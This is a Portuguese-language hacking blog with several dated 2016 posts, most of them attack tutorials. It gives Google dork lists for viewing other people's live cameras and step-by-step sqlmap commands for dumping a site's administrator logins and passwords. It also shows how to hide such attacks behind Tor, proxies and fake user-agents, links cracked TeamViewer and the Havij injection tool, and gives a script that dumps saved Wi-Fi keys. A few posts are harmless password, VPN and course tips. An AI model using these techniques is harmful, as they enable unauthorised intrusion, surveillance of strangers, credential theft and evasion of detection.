terça-feira, 28 de junho de 2016

Publicado terça-feira, junho 28, 2016 por com 0 comentário

Invadir Câmeras pelo Google

Complementando o tutorial sobre Google Hacking, venho disponibilizar esse tutorial de como entrar em câmeras pelo Google.

1º Entre no Google
2° Copie qualquer uma dessas dorks abaixo e faça a pesquisa:

inurl:ViewerFrame?Mode="
inurl:MUltiCameraFrame:?Mode="
inurl:view/index.shtml"
inurl:indexFrame.shtml Axis
inurl:"ViewerFrame?Mode="
intitle:snc-rz30 inurl:home/
inurl:/view/index.shtml
inurl:"ViewerFrame?Mode="
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"
inurl:CgiStart?page=Single
inurl:indexFrame.shtml?newstyle=Quad
intitle:liveapplet inurl:LvAppl
inurl:/showcam.php?camid
inurl:video.cgi?resolution=
inurl:image?cachebust=
intitle:"Live View / - AXIS"
inurl:view/view.shtml
intext:"MOBOTIX M1"
intext:"Open Menu"
intitle:snc-rz30
inurl:home/
inurl:"MultiCameraFrame?Mode="
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:indexFrame.shtml Axis
inurl:"ViewerFrame?Mode="
inurl:"MultiCameraFrame?Mode=Motion"
intitle:start inurl:cgistart
intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
site:.viewnetcam.com -www.viewnetcam.com
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"
inurl:/home/home
"Kamerainformationen anzeigen"
intitle:"AXIS 2100 Network Camera Axis 2100 Network Camera 2.02"
intitle:"Linksys Web Camera" "ver"

3° Após isso serão exibidos vários links, e basta entrar em um e você estará vendo uma câmera ao vivo.



OBS.: 
        1. Para invadir câmeras de segurança (CFTV) você precisará encontrar o IP de algum DVR e tentar encontrar vulnerabilidades no software, como por exemplo, deixar a senha padrão no equipamento.
       2. Para invadir câmeras de notebook ou do computador será necessário você invadir essa máquina, e dependendo do programa de invasão que estiver usando, é possível visualizar a câmera da vítima. 

Futuramente irei postar um tutorial de como fazer a invasão pelo spynet e ter acesso a câmera da vítima
Ver mais
      edit

domingo, 26 de junho de 2016

Publicado domingo, junho 26, 2016 por com 0 comentário

Curso C# Básico e Avançado - Treinamentos TI

Dessa vez vim trazer um curso do site Treinamentos TI, um curso muito bom de C# que vai do iniciante ao avançado.

Para baixar o curso entre nesse torrent e bom aproveito.



Essa é a ementa do curso iniciante:

Cap01 - Introdução ao Treinamento
       
Cap02 - Conceitos Básicos da Programação
   ..Tipos de Dados
   ..Operadores Lógicos/Aritiméticos
   ..Linguagens de programação
   ..Variáveis tipos, declarações
   ..Procedures e funções
   ..Fluxogramas e processos
   ..Lógica
       
Cap03 - Instalando o Visual C# Express
   .. Ferramentas
   .. Versões Existentes
   .. Novidades da versão
   .. Como Instalar o Visual Studio Express
       
Cap04 - Conhecendo o FrameWork do Visual Studio
   ..Tela Inicial, Solution Explorer, Properties, Error List
   ..Windows Forms Aplication / New Project
   ..Interface de Desenvolvimento
   ..Toolbox/Componentes/Controls do C#
   ..Janelas do Visual Studio
   ..Salvando o Projeto
   ..Propriedades dos Controles
       
Cap05 - Utilizando os controles da ToolBox
   ..Conhecendo os Controles da Toolbox
   ..Controles Button e Textbox
   ..As Propriedades dos Controles
   ..Incluindo um item externo ao projeto
       
Cap06 - A primeira Aplicação C#
   ..Trabalhando com Eventos
   ..Debugando e corrigindo Erros
   ..Colocando o código na aplicação
   ..Utilizando MessageBox
   ..Intellisense
   ..Utilizando Funções no C#
       
Cap07 - Trabalhando com Variáveis
   ..Trabalhando com variáveis
   ..Declarando variáveis
   ..Tipos
   ..Expressões Matemáticas
       
Cap08 - Estruturas condicionais
   ..Trabalhando com variáveis
   ..Comando IF
   ..Outras estruturas condicionais
   ..SnipetCodes
       
Cap09 - Estruturas de Repetição - Comando FOR
   ..Outras estruturas de repetição
   ..Comando FOR-NEXT
       
Cap10 - Trabalhando com Windows Form
   ..Modelos de desenvolvimento
   ..Tipos de Janelas, Splash, Login, ...
   ..Modal Form e MDI Forms
   ..Passando informações entre janelas
   ..Exemplos com multiplas janelas
       
Cap11 - Trabalhando com Windows Form II
   ..Trabalhando com controles de Menu
   ..Controles de Rodapé
   ..Criando uma MDI Forms com Menus
       
Cap12 - Janelas de Dialogo
   ..Color/Folder/Open/Save/Font
   ..Abrindo arquivos do Office
   ..Controle RichText
       
Cap13 - Arrays e Vetores
   ..Projeto Caixa de Loja
   ..Carregando Imagens
   ..Formatando Strings e números
   ..Trabalhando com Arrays
   ..Criando um Método próprio
       
Cap14 - Sistema de Arquivos e outros recursos
   ..Trabalhando com FileSystem
   ..FOR EACH
   ..mascaras de pesquisa
   ..identificando os Drives do PC
   ..Tocando musicas WAV
   ..Formatação de Strings e números
       
Cap15 - Arquivos seqüenciais
   ..Trabalhando com Arquivos Sequenciais
   ..StreamReader
   ..StreamWriter
   ..Projeto Editor de Textos
       
Cap16 - Projeto parte 1 - Criando a Interface
   ..Projetando a Interface
       
Cap17 - Projeto parte 2 – Layout do arquivo
   ..Modelando o arquivo de dados
   ..Calculando o tamanho de espaço necessário em disco
       
Cap18 - Projeto parte 3 – Leitura dos Dados e DataGrid
   ..Leitura dos dados
   ..Controle DataGrid
   ..Carregando o Grid
   ..Propriedades e metodos do DataGridView
       
Cap19 - Projeto parte 4 - Analisando o Comportamento
   ..Entendendo o Código
   ..MaskedTextBox
   ..Criticando os Dados
   ..TabIndex
   ..Comportamento dos Botões
       
Cap20 - Projeto parte 5 – Colocando o Codigo CRUD - Parte V
   ..Escrevendo código Inclusão
   ..Escrevendo código Exclusão
   ..Escrevendo código Alteração
       
Cap21 - Projeto parte 6 - Gravação de Dados
   ..Definindo o LayOut
   ..Código da Gravação de Dados (Arq.Seq)
   ..Testando a aplicação desenvolvida
       
Cap22 - Projeto parte 7 - Pesquisa e Deploy
   ..Criando Pesquisa
   ..As pastas de um Projeto
   ..Gerando Executável
   ..Fazendo um Deploy da Aplicação
       
Cap23 - Outros Controles e Recursos
   ..Criando seu próprio Browser
   ..Um Projeto Console Application
   ..Um Projeto WPF
   ..Controles Components
   ..Controles Containers
   ..Controle Timer



Para conferir o conteúdo do curso avançado, entre no site Treinamentos TI

OBS: Não apoio a pirataria desse ótimo material, mas infelizmente nem todos possuem condições para compra-lo.

Fonte: Treinamentos TI
Ver mais
      edit

sábado, 25 de junho de 2016

Publicado sábado, junho 25, 2016 por com 0 comentário

Curso PHP grátis com certificado

PHP é um das linguagens mais conhecidas no mundo. Aproximadamente 75% dos servidores web são em PHP.  Nesse curso você vai aprender a integração do Apache + PHP + MySQL, com 20 módulos.

O curso é oferecido pelo professor Gustavo Guanabara, e possui as seguinte lições:

01 – História do PHP
02 – Como Funciona o PHP
03 – Como Instalar o PHP
04 – Variáveis em PHP
05 – Operadores Aritméticos
06 – Operadores de Atribuição
07 – Operadores Relacionais e Lógicos
08 – Integrando Formulários HTML5 + PHP
09 – Estruturas Condicionais (Parte 1)
10 – Estruturas Condicionais (Parte 2)
11 – Estruturas de Repetição (Parte 1)
12 – Estruturas de Repetição (Parte 2)
13 – Estruturas de Repetição (Parte 3)
14 – Funções e Procedimentos (Parte 1)
15 – Funções e Procedimentos (Parte 2)
16 – Funções String (Parte 1)
17 – Funções String (Parte 2)
18 – Vetores e Matrizes (Parte 1)
19 – Vetores e Matrizes (Parte 2)
20 – Entrevista com Rasmus Lerdorf, criador do PHP

Caso esteja interessado em participar desse curso, basta entrar nesse link


Ver mais
      edit

quarta-feira, 1 de junho de 2016

Publicado quarta-feira, junho 01, 2016 por com 0 comentário

TeamViewer Premium.11.0.56083

Complementando o post TeamViewer 10, dessa vez vim trazer a versão 11.

Primeiramente deve ser baixado nesse link.

1 - Extraia o arquivo TeamViewer.Premium.11.0.56083.rar
2 - Instale normalmente TeamViewer.exe

3 - Após ter instalado, abra o gerenciador de tarefas segurando as teclas Ctrl + Shift + Esc
4 - Procure o processo TeamViewer e finalize. O processo vai aparecer de novo umas 2 ou 3 vezes, finalize-os mesmo assim.

5 - Na pasta crack tem 3 programas, copie eles e cole no diretório C:\Program Files (x86)\TeamViewer

6 - Basta apenas executar o TeamViewer que ele estará crackeado.


Ver mais
      edit

terça-feira, 31 de maio de 2016

Publicado terça-feira, maio 31, 2016 por com 1 comentário

Google Hacking

O Google Hacking é uma ferramenta poderosa para melhorar as buscas no Google afim de coletar dados. Além disso, é um ótima técnica para encontrar coisas mais profundas dentro de sites, como documentos, PDFs, etc.

Com essas buscas podemos encontrar falhas de SQL Injection, diretórios abertos, arquivos sigilosos, senhas, e muitos outros tipos de falhas e documentos.



Para usar essa técnica é muito simples, basta apenas os operadores avançados do google. Abaixo vou deixar apenas o principais utilizados em pesquisas hackers:

PesquisaOperadores
WEBallinanchor:, allintext:, allintitle:, allinurl:, cache:, define:, 
filetype:, id:,inanchor:, info:, intext:, intitle:, inurl:, link:,
 related:, site:
Imagensallintitle:, allinurl:, filetype:, inurl:, intitle:, site:
Gruposallintext:, allintitle:, author:, group:, insubject:, intext:,intitle:
Diretórios e
Arquivos
allintext:, allintitle:, allinurl:, ext:, filetype:, intext:, intitle:,
inurl:
Notíciasallintext:, allintitle:, allinurl:, intext:, intitle:, inurl:, location:, 
source:
Produtosallintext:, allintitle:

Vou exemplificar os principais operadores, chamados também de dorks:

allintitle:"index of" passwd = Procura por títulos em página que contenha essas duas palavras. Quando está entre aspas, o Google traz apenas o resultados que contenha todo esse termo

intitle:restricted filetype:doc site:gov = Procura títulos que contêm a palavra restricted, documentos do tipo doc, e apenas sites que são gov

inurl:/adminlogin.asp  = Essa dork vai procurar em urls que tenha a palavra-chave /adminlogin.asp

inurl:".php?id=" = Dork muita usada para procurar sites vulneráveis a SQL Injection

intext:telefone site:com.br filetype:txt = Procura no conteúdo da página a palavra telefone, em sites que são .com.br, e apenas em arquivos txt, que são arquivo sensíveis.

senhas ext:mdb = Procura especificamente arquivos com extensão .mdb

OBS.: A diferença intitle e allintitle é que allintitle procura por mais de um termo e intitle por apenas um.

Com esses operadores você tem uma arma na mão, pode conseguir muitas informações do seu alvo apenas pesquisando no Google.

Fonte: Google Guide
Ver mais
      edit

segunda-feira, 23 de maio de 2016

Publicado segunda-feira, maio 23, 2016 por com 7 comentários

Script Batch para pegar senhas Wi-Fi salvas

Windows

Esse script tem vários comandos que tem por objetivo gravar um log chamado senhas.txt, contendo todas as senhas Wi-Fi gravadas no PC.

Para usar esse script basta apenas copiar e colar em um bloco de notas e salvar como .bat, por exemplo arquivo.bat

echo %date% %time%>>senhas.txt
echo %username%>>senhas.txt
echo - >>senhas.txt
netsh wlan show profile name=* key=clear >>senhas.txt
echo -------------------------------------------------------- >> senhas.txt
pause


Linux

O comando equivalente ao rodado no windows, é o sudo iwlist wlan0 scan, onde wlan0 é sua placa de rede Wi-Fi. Para descobrir qual é a placa basta digitar o comando ifconfig no terminal, como mostra na imagem abaixo:

Executando o comando citado acima será retornado todas as informações sobre a rede onde está conectado, como tipo de encriptação, sinal, qualidade, canal, SSID, entre outros:


Ver mais
      edit

sexta-feira, 20 de maio de 2016

Publicado sexta-feira, maio 20, 2016 por com 2 comentários

Dicas para criar senhas complexas

Introdução

Ao criar senhas fortes, geralmente é recomendado fazê-las com 8 a 10 caracteres, com letras maiúsculas, minúsculas, números e algumas vezes caracteres especiais. Isso é realmente bom, mas quando se trata de relembrar esses combinações de letras-números é algo tão difícil quanto resolver uma equação complicada de matemática.
Algumas vezes, nós tentamos sermos espertos e usamos um gerador de senha. Essas ferramentas criam senhas fortes e boas. Ao clicar no botão de gerar senha, você pega alguma coisa como: "8haq4-5@l.a". Esse tipo de senha é impossível de lembrar.

Então, vou deixar algumas dicas simples para criar senhas.

1. Evite usar datas

2. Mescle números, letras e símbolos

Usando própria lógica, você pode pegar um simples nome como tatiane e torná-la uma senha complexa, por exemplo, t@T14N3

3. Evite senhas apenas numéricas e palavras do dicionário

Evite senhas 12345, 54321, Deus, amor, ou qualquer outra palavra que esteja no dicionário mesmo que seja em outra língua. Geralmente Brute-force attack quebram senhas baseadas em dicionários

4. Não use número da placa do carro, telefones ou mesmo o próprio login

5. Evite senhas relacionadas com coisas ao seu redor ou ao seu próprio gosto

6. Não utilize senhas parecidas com as anteriores

7. Caso tenha muitas senhas pode usar um gerenciador de senhas

Gerenciadores de passwords são programa que armazenam de forma seguras suas informações de login através de criptografia. Eu encontrei ferramenta chamada KeePass disponível aqui. É grátis, código-aberto, simples e fácil de gerenciar, podendo ser utilizado no Windows, Linux, Mac OS X, e dispositivos Android. Há muitos outros gerenciadores bom, use o que melhor te atender.

Conclusão
Há vários métodos para criar e armazenar senhas fortes; todo mundo tem o seu próprio. Estou apenas compartilhando minha opinião e espero que elas sejam úteis.
Há também a opção de gerar uma senha para uma determinada palavra, entre nesse site e faça o teste.

Ver mais
      edit
Publicado sexta-feira, maio 20, 2016 por com 0 comentário

TeamViewer 10.0.36244 crackeado

Quem usa o TeamViewer sabe que é uma ferramenta muito prática no acesso remoto à outro computador. Você consegue acessar e controlar um computador à distância como se estivesse sentado à frente dele.

Com o tempo, fazendo vários acessos ele começa a aparecer a mensagem de uso comercial. E nada mais chato que essas mensagens e o corte do acesso em 5 minutos. Por esse motivo estou disponibilizando o programa crackeado.



Instalação!
1 - Baixe o arquivo "TeamViewer 10.0.36244 + All Edition Crack.rar"
2 - Extraia com o programa WinRAR e digite a senha "https://secdigital.blogspot.com.br"
3 - Abra o arquivo "TeamViewer_Setup_en.exe" e então faça a instalação normal usando o diretório padrão
4 - NÃO abra o Team Viewer depois de instalado
5 - Existem 2 cracks na pasta, escolha aquele que desejar de acordo com suas necessidades

Clique aqui para baixar


Ver mais
      edit

sexta-feira, 13 de maio de 2016

Publicado sexta-feira, maio 13, 2016 por com 27 comentários

Havij 1.14 (melhor versão)

Complementando o post Havij 1.17 PRO vim trazer uma das melhores versões do Havij, a versão 1.14. Praticamente em todos ataques SQL eu uso ele.

Essa versão é a mais prática, não basta instalar nada, apenas descompacte o arquivo Havij 1.14 - Advanced SQL Injection e digite a senha https://secdigital.blogspot.com.br. Para baixar clique aqui.

Primeiramente você deve ter o Winrar instalado ou outro programa que abra arquivos compactados (.rar)


Após digitar a senha, descompacte os arquivos para um local desejado.


Depois de extrair os arquivos, basta executar o Havij






Download: clique aqui
Senha: https://secdigital.blogspot.com.br

Ver mais
      edit

sexta-feira, 6 de maio de 2016

Publicado sexta-feira, maio 06, 2016 por com 0 comentário

Fazer uma chamada restrita (número desconhecido)

Muitas vezes queremos fazer uma ligação com um número desconhecido, e isso não significa algo ilícito, muitas vezes algumas pessoas simplesmente preferem a privacidade. Há algumas possibilidades que serão descritas logo abaixo. Apenas para números da claro que o procedimento é diferente.

Método 1 - #31#

No Brasil, as operadoras oferecerem gratuitamente um serviço para deixar seu número restrito durante a ligação. Para usar basta apenas colocar #31# antes do número, por exemplo:
#31# 1234-1234 (ligação local)
#31# 9090 1234-1234 (ligação local à cobrar)
#31# 0 XX 12 1234-1234 (ligação interurbana, onde xx é a operadora)
#31# 90 XX 12 1234-1234 (ligação interurbana à cobrar)

Método 2 - Configurações do aparelho celular

A maioria dos smartphones hoje dispõe dessa configuração. Geralmente os locais de configurações mudam de acordo com a versão

  • Em iPhones vá em Configurações / Telefone / Mostrar ID de chamada. Apenas desative o "ID de chamada".
  • Em Android, as configurações foram feitas na versão 4.1.2. Basta entrar em "Telefone" e toque no botão "Menu". Vá em Configuração de chamadas / Configurações adicionais / ID de chamada e selecione a opção "Ocultar número".
  • Outra alternativa é entrar em Configurações / Gerenciar cartões SIM / Configurações de ligação / Configuração de ligação do SIM e escolha o chip desejado. Vá em Configurações adicionais / ID de chamada e selecione a opção "Ocultar número".
  • Em Blackberry vá no botão Blackberry / Opções / Configurações de chamada interna e na seção "Restringir minha identidade", escolha "Sempre". Vá no botão Blackberry novamente e escolha "Salvar".
Método 3 - Aplicativos

Caso ainda não tenha conseguido realizar a ligação você pode tentar usar aplicativos específicos.

  • No Android, uma opção boa é o HiddenCall, pois é gratuito e suporta a maiorida das versões do sistema.
  • No iPhone, você pode baixar o Hide My Phone que também é gratuito.
  • Caso seja Windows Phone, baixe o Anonymous Call.
Método 4 - Apenas para chips da Claro

Independente do tipo de celular que você estiver basta apenas no ligar no número *1052#, e vai aparecer Canal Interativo da Claro. Nesse menu entre no número 9. Mais opções / 5. Serviços Ativos / 1. Sigilo de chamadas / 1. Continuar. Após esse procedimento pode demorar alguns minutos até 4 horas para o serviço ser ativo.

Para desativar é necessário seguir o mesmo procedimento.




Ver mais
      edit

segunda-feira, 2 de maio de 2016

Publicado segunda-feira, maio 02, 2016 por com 0 comentário

VPN para Android ou IOS

Com esses eventuais bloqueios do WhatsApp nada melhor do que uma VPN (Virtual Private Network) para resolver o problema. Existem inúmeros Apps que realizam essa função, e irei listar alguns.

Betternet: Unlimited Free VPN

Essa VPN funciona tanto no Android como no IOS. Assim que abrir o App, deslize para a direita até encontrar um simbolo cinza. Basta apenas selecionar a opção "CONNECT" para conectar a VPN, onde o aplicativo vai escolher o automaticamente o servidor proxy para se conectar. Quando a conexão estiver ligada, o simbolo vai ficar azul. Para desconectar, basta selecionar "DISCONNECT". As maiores vantagens desse aplicativo são o fato de ser grátis e de não precisar de cadastro para usar a VPN.



Hola premium VPN

Outra VPN poderosa é o Hola, já que é mais completa e tem com mais funções. A desvantagem é a necessidade de fazer um cadastro no aplicativo e o consumo de memória RAM. No Hola você pode escolher quais aplicativos vão utilizar a rede VPN.


Private Internet Access

Funciona tanto para Android como IOS, é uma das melhores VPN segundo levamentos sobre segurança e privacidade, pois ele não mantém registro de suas atividades e faz uso de IPs compartilhados. Contudo a desvantagem é o pagamento mensal pelo serviço. 




Psiphon

Na categoria grátis, esse aplicativo é um dos melhores, não só por usar redes VPN para fazer o tuneamento das informações. Mas dentre algumas das suas ferramentas, geralmente usuários conseguem usar a internet mesmo após o término da franquia da internet pelas operadoras. 





Quais os riscos

Como nem tudo é um mar de rosas, ao navegar numa VPN todos os dados passam por um provedor, ou seja, todo o fluxo de informações passa por uma rede privada que fornece o serviço. Por isso altamente recomendável não conectar em contas bancárias, redes sociais e emails. O máximo deve ser nos mensageiros instantâneos como o WhatsApp.

Sobre os aspectos legais

Não é crime usar VPN, e por isso não existe qualquer tipo de implicação jurídica que torne essa prática ilegal.

Outras VPNs

SuperVPN Free VPN Client, Flash VPN Free VPN Proxy, TunnelBear VPN, cada uma com suas características, vantagens e desvantagens, porém todas cumprem o seu papel de criar um tunelamento para você navegar anônimo e burlar bloqueios, firewalls, etc.
Ver mais
      edit

quarta-feira, 13 de abril de 2016

Publicado quarta-feira, abril 13, 2016 por com 0 comentário

Atacar site com a ferramenta SQLMap

A ferramenta sqlmap é muito utilizada no Linux para verificar vulnerabilidades sqlinjection em diversos sites, mas também tem sua versão para o Windows. Como ele tem inúmeras funções, vamos detalhar algumas e efetuar o ataque.



Ao fazer algumas buscas no Google encontramos diversos sites vulneráveis, mas nesse tutorial vamos utilizar um site fictício.

Vamos inserir a página vulnerável:
sqlmap -u http://www.site.com.br/index.php?id=9

Dependendo da versão do sqlmap devemos digitar da seguinte maneira:
python sqlmap.py -u http://www.site.com.br/index.php?id=9

Agora vamos descobrir a versão do Bando de Dados do site:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -b

Pegando todos os bancos de dados do site:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 --dbs

Como alguns sites retornam muitos bancos de dados é complicado explorar todos, por isso vamos apenas pegar o que o site utiliza:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 --current-db

Agora vamos pegar as tabelas do banco de dados:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco --tables

Explicando os parâmetros:
-D = Indica o nome do banco de dados que será utilizado.
--tables = Pega todas as tabelas do banco de dados.

Supõe que o site retornou as seguintes tabelas:
Notícias
Vídeos
Clientes
Administrador

Vamos descobrir as colunas da tabela que nos interessa, a tabela administrador:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco -T administrador --columns

Explicando os parâmetros:
-T = Indica qual a tabela que vai ser usada
--columns = Pega todas as colunas da tabela desejada.

Supõe que dentro dessa tabela tinha as seguintes colunas:
nome
email
login
senha

Vamos pegar só as colunas interessantes, login e senha:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco -T administrador -C login,senha --dump

Explicando os parâmetros:
-C =Indica quais colunas que vou pegar os dados
--dump = Puxa todos os dados

Você também pode retornar todas as tabelas com todas colunas:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco --tables --dump-all

Caso queira aumentar a segurança no ataque pode usar um proxy http,https ou socks:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco -T administrador -C login,senha --dump --proxy http://127.0.0.0:9666

Caso queira saber sobre proxys no Sql Injection, veja esse tutorial aqui.


Ver mais
      edit

sexta-feira, 8 de abril de 2016

Publicado sexta-feira, abril 08, 2016 por com 1 comentário

Atacando Anônimo com SQL Injection

Se você acha que é só ligar o TOR ou algum outro proxy e fazer o ataque está muito enganado. Precisamos também configurar a ferramenta, caso contrário você ainda está exposto. Nesse tutorial irei abordar 3 ferramentas: SQLMap (muito utilizado na plataforma Linux), Havij (windows) e Acunetix (scan de vulnerabilidades).

SQLMap

Geralmente atacamos da seguinte maneira:

sqlmap -u vitima.com.br --dbs

Com isso os logs no site saíram assim:

200.98.45.235 - - [08/Abr/2016:17:21:59 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:00 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:00 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:01 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)

Nos logs, informações importantes são expostas, como o IP verdadeiro, mesmo usando o TOR, e o user-agent do browser, que no caso é sqlmap.

O primeiro passo é alterar o user-agent:

sqlmap -u vitima.com.br --dbs --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10"

E os logs são expostos dessa maneira:

200.98.45.235 - - [08/Abr/2016:17:24:12 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:12 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:13 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:15 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10

Para camuflar bem o ataque podemos utilizar duas maneiras:

sqlmap -u vitima.com.br --dbs --random-agent  --tor --tor-type=SOCKS5

sqlmap -u vitima.com.br --dbs --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10" --proxy=http://127.0.0.0:9666

OBS.: Na segunda forma estou usando o proxy Ultrasurf.
Assim, os logs saíram da seguinte maneira:

66.23.129.31 - - [08/Abr/2016:17:30:02 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:03 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:04 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:04 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10


Havij

Como é interface gráfica, é muito mais fácil. Primeiro vá em settings, general, marque a caixa "proxy" e no espaço digite 127.0.0.1 e na porta:9666 (TOR não pode ser utilizado no Havij, já que é um socks)
Em "Http Headers" altere o User-Agent para qualquer um de sua preferência, mas não deixe a padrão;
E clique em "Apply"



Acunetix

Vá em Configuration>Scan Settings>LAN Settings
Marque a caixa "Use an Http Proxy Server" e em "hostname" digite 127.0.0.1 e em "port" digite 9666.
Agora vá em HTTP Options e altere o UserAgent

OBS.: No Acunetix é possível usar o TOR como socks.







Outros user-agent que podem ser úteis futuramente:

Internet Explorer: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla Firefox: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Opera: Opera/9.23 (Windows NT 5.1; U; en-US)
Safari: Opera/9.23 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
Ver mais
      edit

terça-feira, 5 de abril de 2016

Publicado terça-feira, abril 05, 2016 por com 0 comentário

Navegando anônimo na internet

Existem várias formas de navegar anônimo, e abordaremos principalmente proxies. Segundo o Wikipedia, proxy é o termo utilizado para definir os intermediários entre o usuário e seu servidor. E por isso desempenha a função de conexão do computador (local) à rede externa (Internet).

Se você quer apenas esconder seus rastros pode usar o Ctrl+Shift+N do Chrome, ou Ctrl+Shift+P do Firefox.



Caso deseje esconder seus rastros e ocultar seu IP podemos utilizar o TOR. Para sua utilização basta apenas baixá-lo aqui, e instalar normalmente, clicando em next, next, next.



Outra ferramenta muito boa é o Ultrasurf, que pode ser baixado aqui. Além de esconder seu IP, ele geralmente burla firewall e deixa você navegar normalmente em redes bloqueadas já que ele funciona como uma VPN, criando um túnel de navegação. Para quem não sabe, segundo o Wikipédia, VPN ou Virtual Private Network (Rede Privada Virtual) trata-se de uma rede privada construída sobre a infraestrutura de uma rede pública. Essa é uma forma de conectar dois computadores através de uma rede pública, como a Internet.







Observando a primeira imagem, principalmente o ícone diferenciado no canto esquerdo do navegador, concluímos que estou em modo anônimo utilizando o navegador. Juntamente com o Ultrasurf fica muito difícil para alguém rastrear.

Para confirmar se o seu IP mudou, basta entrar no site meu ip.
Ver mais
      edit

segunda-feira, 21 de março de 2016

Publicado segunda-feira, março 21, 2016 por com 0 comentário

Como Rastrear um IP

Nesse tutorial, iremos utilizar 2 ferramentas: o CMD ou terminal e o site ip-adress.

Para exemplificar usaremos o google.com.br como alvo.

Primeiramente abra o terminal ou cmd e digite o seguinte comando:
ping google.com.br

O IP da vítima irá aparecer desta maneira:


Depois disso, basta copiar esse IP, no nosso caso 216.58.202.99, e entrar no site ip-adress. Após entrar no site, digitamos o IP como mostrado na figura abaixo:


Ao clicar no botão "Track IP, host or website" irá aparecer o rastreamento com o Google Maps:


Podemos observar que ele dá informações sobre a cidade, estado, país, código postal e outros. A partir disso você pode levantar mais informações como o whois do IP, telefones, etc.
Ver mais
      edit

terça-feira, 8 de março de 2016

Publicado terça-feira, março 08, 2016 por com 0 comentário

Invadir computador através do mouse ou teclado sem fio

Pesquisadores de segurança da Bastille anunciaram a descoberta de uma vulnerabilidade em mouses sem fio que torna possível a instalação de rootkits em computadores. Para quem nunca ouviu falar, é uma empresa especialista em segurança.

As fabricantes de mouse como a Dell, HP, Lenovo, Microsoft, Gigabyte e outras, já anunciaram que vão lançar novos mouses e teclados usando corretamente a criptografia.



Os pesquisadores fizeram um site https://www.mousejack.com/ com mais informações sobre a falha. Também disponibilizaram no GitHub um kit de ferramentas em python que podem ser usados para descobrir dispositivos vulneráveis.

Para explorar a falha, a vítima deve está no máximo 100 metros de distância para poder interceptar os pacotes enviados entre o mouse e o computador, e assim substituir o sinal por outro, com pacotes infectados com um rootkit. Veja a demonstração abaixo:




Se deseja saber mais informações, leia a matéria original
TheHackerNews
Ver mais
      edit

sexta-feira, 4 de março de 2016

Publicado sexta-feira, março 04, 2016 por com 0 comentário

Descobrir vulnerabilidades em sites Joomla

Nesse tutorial vamos usar o joomscan, que é uma ferramenta feita em perl para verificar vulnerabilidades em sites Joomla. Ao fazer o scan, ele mostra qual a vulnerabilidade e qual o exploit deve ser usado para explorá-la.

Esse tutorial direcionado para usuários windows. Primeiramente, baixe o programa aqui Joomscan.pl

Lembrando que devemos ter instalado Perl para poder rodar o joomscan. Se quiser, pode entrar no site oficial https://www.perl.org/get.html

Depois disso só usar com o seguinte comando:

joomscan.pl -u <string> -x proxy:port

Muito usuários reclamam desse erro:
joomscan.pl check
